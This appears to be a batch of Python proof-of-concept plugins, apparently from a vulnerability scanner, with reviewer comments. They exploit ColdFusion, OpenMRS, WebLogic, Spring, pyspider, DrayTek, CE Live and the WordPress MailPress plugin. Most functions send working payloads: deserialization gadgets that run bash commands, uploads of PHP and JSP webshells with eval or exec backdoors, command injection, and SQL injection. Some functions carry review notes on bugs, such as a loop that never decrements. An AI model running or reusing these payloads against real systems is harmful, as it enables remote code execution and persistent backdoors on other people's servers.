    # NOTE(review): as rendered here the format string has no {filename} placeholder,
    # so .format() is a no-op and the later GET uses a name the server never saw;
    # "(unknown)" may be an artefact of this page -- confirm against the upstream file
    data += "Content-Disposition: form-data; name=\"file\"; filename=\"(unknown)\"\r\n".format(filename=filename)
    data += "Content-Type: image/jpeg\r\n"
    data += "\r\n"
    data += "{content}\r\n".format(content=content)
    data += "-----------------------------24464570528145\r\n"
    data += "Content-Disposition: form-data; name=\"path\"\r\n"
    data += "\r\n"
    data += "we\r\n"
    data += "-----------------------------24464570528145--\r\n"
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
        # boundary must match the one used in `data`
        "Content-Type": "multipart/form-data; boundary=---------------------------24464570528145"
    }
    req.post(url, headers=header, data=data)
    file_path = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/" + filename
    file_url = urljoin(self.url, file_path)
    response = req.get(file_url)
    if content in response.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        result['VerifyInfo']['Shell'] = file_url
    return self.parse_output(result)
def poc(url):
    """Probe the OpenMRS REST concept endpoint with a serialized XML object graph.

    An empty application/xml POST is sent first; only a 500 leads to the second POST,
    whose body embeds command_str (module-level, not visible here) in a ProcessBuilder.
    Returns True when that response is a 500 containing "java.util.HashMap", False on a
    non-500 first response or any exception, and None when the inner loop is left by
    break (non-500 second response or KeyboardInterrupt).
    NOTE(review): the block nesting below was reconstructed from a one-line listing; the
    `else: return False` is read as belonging to `if r.status_code == 500` -- confirm.
    """
    proxy = {}
    ressource = "/openmrs/ws/rest/v1/concept"
    burp0_url = url + ressource
    burp0_headers = {"Content-Type": "application/xml"}
    try:
        r = req.post(burp0_url, headers=burp0_headers, proxies=proxy, verify=False, allow_redirects=False)
        if r.status_code == 500:
            # the loop runs at most once: every path inside returns or breaks
            while True:
                try:
                    burp0_url = url + ressource
                    burp0_headers = {"Content-Type": "text/xml"}
                    burp0_data = "<map>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString>\r\n <flags>0</flags>\r\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n <dataHandler>\r\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n <is class=\"javax.crypto.CipherInputStream\">\r\n <cipher class=\"javax.crypto.NullCipher\">\r\n <initialized>false</initialized>\r\n <opmode>0</opmode>\r\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"javax.imageio.spi.FilterIterator\">\r\n <iter class=\"java.util.Collections$EmptyIterator\"/>\r\n <next class=\"java.lang.ProcessBuilder\">\r\n <command>\r\n <string>/bin/bash</string>\r\n <string>-c</string>\r\n \t\t\t<string>{echo," + command_str + \
                        "}|{base64,-d}|{bash,-i}</string>\r\n </command>\r\n <redirectErrorStream>false</redirectErrorStream>\r\n </next>\r\n </iter>\r\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n <method>\r\n <class>java.lang.ProcessBuilder</class>\r\n <name>start</name>\r\n <parameter-types/>\r\n </method>\r\n <name>foo</name>\r\n </filter>\r\n <next class=\"string\">foo</next>\r\n </serviceIterator>\r\n <lock/>\r\n </cipher>\r\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n <ibuffer></ibuffer>\r\n <done>false</done>\r\n <ostart>0</ostart>\r\n <ofinish>0</ofinish>\r\n <closed>false</closed>\r\n </is>\r\n <consumed>false</consumed>\r\n </dataSource>\r\n <transferFlavors/>\r\n </dataHandler>\r\n <dataLen>0</dataLen>\r\n </value>\r\n </jdk.nashorn.internal.objects.NativeString>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n <entry>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n </entry>\r\n</map>"
                    r = req.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy, verify=False, allow_redirects=False)
                    if r.status_code == 500:
                        # the class name in the error body is the success indicator
                        m = re.search('(java.util.HashMap)', r.text)
                        if m:
                            return True
                        else:
                            return False
                    else:
                        break
                except KeyboardInterrupt:
                    break
        else:
            return False
    except:
        return False
def _verify(self):
    """Verify mode: posts an XMLDecoder WorkContext that writes a JSP under bea_wls_internal, then requests it.

    The JSP only responds to a fixed pwd value and prints a fixed flag; the flag in
    the GET response marks success and a slice of the body is stored as Response.
    Errors are printed, not raised. Returns self.parse_attack(result).
    """
    result = {}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
        "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3",
        "Content-Type": "text/xml"
    }
    payload = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/0bxxl42slk.jsp</string> <void method="println"><string><![CDATA[<% if("hobs7p".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("flag:m36ty4jg"); while((a=in.read(b))!=-1){ out.println(new String(b)); } } %>]]></string></void><void method="close"/> </void></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope> '''
    try:
        if '://' not in self.url:
            self.url = 'http://' + self.url
        url_1 = self.url + '/wls-wsat/CoordinatorPortType11'
        # response of the write request is not inspected
        req.post(url_1, data=payload, headers=headers, timeout=5)
        url_2 = self.url + '/bea_wls_internal/0bxxl42slk.jsp?pwd=hobs7p&i=whoami'
        resp = req.get(url_2, timeout=5)
        if resp.status_code == 200 and 'flag:m36ty4jg' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Webshell'] = self.url + '/bea_wls_internal/0bxxl42slk.jsp?pwd=hobs7p&i=whoami'
            # [13:38] skips the 13-byte "flag:m36ty4jg" prefix and keeps the next 25 bytes
            result['VerifyInfo']['Response'] = resp.content[13:38]
    except Exception as e:
        print(e)
    return self.parse_attack(result)
def poc(url):
    """POST the module-level poc_str to {url}/hotels/booking?execution=e1s2 and return the response text.

    A missing scheme is defaulted to http://. Returns "" when the request raises.
    NOTE(review): `"/" in url` is always true once the scheme has been added, so the
    path is appended unconditionally. poc_str, headers and `req` are module-level.
    """
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/hotels/booking?execution=e1s2'
    try:
        res = req.post(url, data=poc_str, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response
def poc(url):
    """POST the module-level poc_str to {url}/users?page=&size=5 and return the response text.

    A missing scheme is defaulted to http://. Returns "" when the request raises.
    NOTE(review): `"/" in url` is always true once the scheme has been added, so the
    path is appended unconditionally. poc_str, headers and `req` are module-level.
    """
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/users?page=&size=5'
    try:
        res = req.post(url, data=poc_str, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response
def _attack(self):
    """Attack mode: uploads a PHP file through the ajax upload endpoint and posts to it to confirm execution.

    Mirrors the verify-mode flow: a temporary s.php is written to the working
    directory, posted as `filename`, removed locally, and the path the server
    echoes back is requested with a `pass` field; 'poctest' in the reply marks
    success. Returns self.parse_output(result).
    """
    result = {}
    url = urlparse.urljoin(self.url, 'index.php?do=ajax&view=upload&file_type=big&filename=filename')
    shell = "Ra<?php $e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e));?>"
    # create the file locally
    f = open('s.php', 'wb+')
    f.write(shell)
    f.flush()
    f.close()
    # upload the file
    f = open('s.php', 'rb')
    files = [('filename', ('php.php', f, 'jpg'))]
    resp = req.post(url, files=files)
    # delete the local file just created
    # NOTE(review): if req.post raises, s.php is left behind in the working directory
    f.close()
    os.remove('s.php')
    # match the stored path and request it to confirm the upload succeeded
    match = re.findall(r'"(data\\\/uploads\\\/.*?\.php)"', resp.content)
    if match:
        url = urlparse.urljoin(self.url, '/' + match[0].replace('\\', '') + '?e=YXNzZXJ0')
        head = {'Content-Type': 'application/x-www-form-urlencoded'}
        # the "******" value appears to be a redaction on this page -- confirm upstream
        data = {'pass': '******'}
        resp = req.post(url, headers=head, data=data)
        if resp.status_code == 200 and 'poctest' in resp.content:
            result['FileInfo'] = {}
            result['FileInfo']['Fileame'] = url
            result['FileInfo']['Content'] = shell
    return self.parse_output(result)
def set_new_upload_path(host, path):
    """Set the ws_utc work directory of `host` to `path` through the settings endpoint.

    Returns True when the response contains "successfully"; otherwise prints a
    failure line and terminates the process via exit(resp.content).
    NOTE(review): exiting the interpreter from a helper makes this unusable from a scanner loop.
    """
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest',
    }
    data = {
        "setting_id": "general",
        "BasicConfigOptions.workDir": path,
        "BasicConfigOptions.proxyHost": "",
        "BasicConfigOptions.proxyPort": "80"}
    resp = req.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
    if "successfully" in resp.content:
        return True
    else:
        print("[-] Change New Upload Path failed")
        exit(resp.content)
def poc(url):
    """Send poc_str and poc_str1 to {host}:9200/_search?pretty and report whether both markers appear.

    Returns True only when "uid=" is in the first response and "2500" in the
    second; False otherwise or when a request raises.
    NOTE(review): [7:] blindly drops the first seven characters, i.e. it assumes
    `url` starts with "http://" and strips any existing port or path handling.
    poc_str, poc_str1, headers and `req` are module-level.
    """
    a = False
    url = str(url)[7:]
    url = "http://" + url + ":9200/_search?pretty"
    try:
        res = req.post(url, data=poc_str, verify=False, timeout=5, headers=headers)
        # print res.status_code
        res1 = req.post(url, data=poc_str1, verify=False, timeout=10, headers=headers)
        response = res.text
        # print response
        response1 = res1.text
        if "2500" in response1 and "uid=" in response:
            a = True
    except Exception:
        response = ""
    return a
def check_accurate(ip, port):
    '''
    accurate check
    check if python script can be executed

    Posts a form-encoded handler script plus task JSON to the pyspider debug
    run endpoint and looks for the script's print output in the "logs" field.
    Returns True on that match, False on any exception or no match.
    '''
    url = "http://" + ip + ":" + str(port) + "/debug/pyspidervulntest/run"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = ''' webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print('pyspidervulnerable')&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D '''
    try:
        r = req.post(url=url, data=data, headers=headers, timeout=1)
        # the debug endpoint returns JSON whose "logs" field carries the script's stdout
        if '"logs": "pyspidervulnerable\\n"' in r.text:
            return True
    except Exception:
        return False
    return False
def run_cmd(self, cmd):
    """Send `cmd` inside the keyPath field of /cgi-bin/mainfunction.cgi and return the response text.

    Returns the body on HTTP 200 and "" for any other status or exception.
    NOTE(review): the header key is "UserAgent", not "User-Agent", so no UA header
    is actually set; `cmd` is placed in the query string without URL-encoding.
    """
    try:
        headers = {
            "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
        }
        url = self.url + "/cgi-bin/mainfunction.cgi"
        data = "action=login&keyPath=%27%0A%2fbin%2f" + cmd + "%0A%27&loginUser=a&loginPwd=a"
        # (connect, read) timeouts of 10 s / 15 s
        res = req.post(url=url, data=data, timeout=(10, 15), headers=headers)
        if res.status_code == 200:
            return res.text
        else:
            return ""
    except Exception as e:
        return ""
def _verify(self):
    """Verify mode: sends an error-based SQL probe in an xajax argument and looks for MD5(233).

    The probe makes the database error message carry md5(233) (e165421110ba03099a1c0393373c5b43);
    its presence in the response body marks the target. Returns self.parse_attack(result).
    """
    result = {}
    vul_url = self.url + '/celive/live/header.php'
    payload = {
        'xajax': 'LiveMessage',
        'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
                              "floor(rand(0)*2),(select md5(233)))a from "
                              "information_schema.tables group by a)b),"
                              "'','','','1','127.0.0.1','2') #"
    }
    response = req.post(vul_url, data=payload, timeout=30).content
    if 'e165421110ba03099a1c0393373c5b43' in response:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_url
    return self.parse_attack(result)
def _attack(self):
    """Attack mode: saves a mailpress autosave whose subject holds PHP, then walks ids downward looking for it.

    A random 8-digit flag and its md5 identify the stored entry; the URL is
    trimmed to scheme://host/<first path segment> before use. Each id from the
    autosave's own id down to 1 is fetched via action=iview until the hash appears.
    Returns self.parse_output(result).
    NOTE(review): the Content recorded on success ($_REQUEST[c1tas]) does not match
    the parameter actually sent in the subject ($_REQUEST[shell]).
    """
    result = {}
    flag = ''.join([random.choice(string.digits) for _ in range(8)])
    flag_hash = hashlib.md5(flag).hexdigest()
    exp_url = "wp-content/plugins/mailpress/mp-includes/action.php"
    post_data = {
        'action': 'autosave',
        'id': '0',
        'revision': '-1',
        'to_list': '1',
        'subject': '<?php echo md5(' + flag + '); @eval($_REQUEST[shell]);?>',
        'mail_format': 'standard',
        'autosave': '1'
    }
    # keep only the first path segment so exp_url is joined at the site root
    tmpparse = urlparse.urlparse(self.url)
    if tmpparse.path != '':
        self.url = tmpparse.scheme + '://' + tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
    else:
        self.url = tmpparse.scheme + '://' + tmpparse.netloc
    vul_url = self.url + '/' + exp_url
    base_rep = req.post(vul_url, data=post_data)
    # NOTE(review): getid[0] raises IndexError when the response has no <autosave id='...'>
    getid = re.findall(r'<autosave id=\'[\d]*\'', base_rep.content, re.I)
    tmpid = getid[0].split("'")[1]
    # NOTE(review): tmpid is never decremented, so this loop either breaks on the
    # first hit or repeats the same request forever
    while int(tmpid) > 0:
        shell_url = self.url + '/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=' + tmpid
        rep = req.get(shell_url)
        if flag_hash in rep.content:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = shell_url
            result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'
            break
    return self.parse_output(result)